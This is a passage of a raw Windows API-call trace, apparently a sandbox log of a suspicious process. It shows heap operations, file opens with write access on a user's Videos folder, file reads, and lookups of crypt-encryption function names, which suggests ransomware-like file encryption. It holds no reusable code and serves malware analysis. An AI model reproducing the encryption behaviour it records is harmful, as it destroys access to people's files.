(HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.598] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0199.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff18 | out: hHeap=0x8a0000) returned 1 [0199.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0199.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0199.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0199.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\j9c7.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0199.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0199.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0199.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0199.603] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0199.603] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4606, lpOverlapped=0x0) returned 1 [0199.605] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0199.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0199.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4606) returned 0x901190 [0199.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0199.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0199.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4606) returned 0xbea018 [0199.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x901190 | out: hHeap=0x8a0000) returned 1 [0199.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.606] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4606) returned 0x901190 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x901190 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0199.607] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.607] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4606) returned 0x901190 [0199.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0199.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0199.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4606) returned 0xbee628 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0199.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.609] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0199.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0199.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0199.609] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0199.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0199.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.609] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0199.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0199.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2718 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0199.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0199.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.610] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.614] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0199.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.614] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0199.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.615] HeapFree (in: hHeap=0x8a0000, 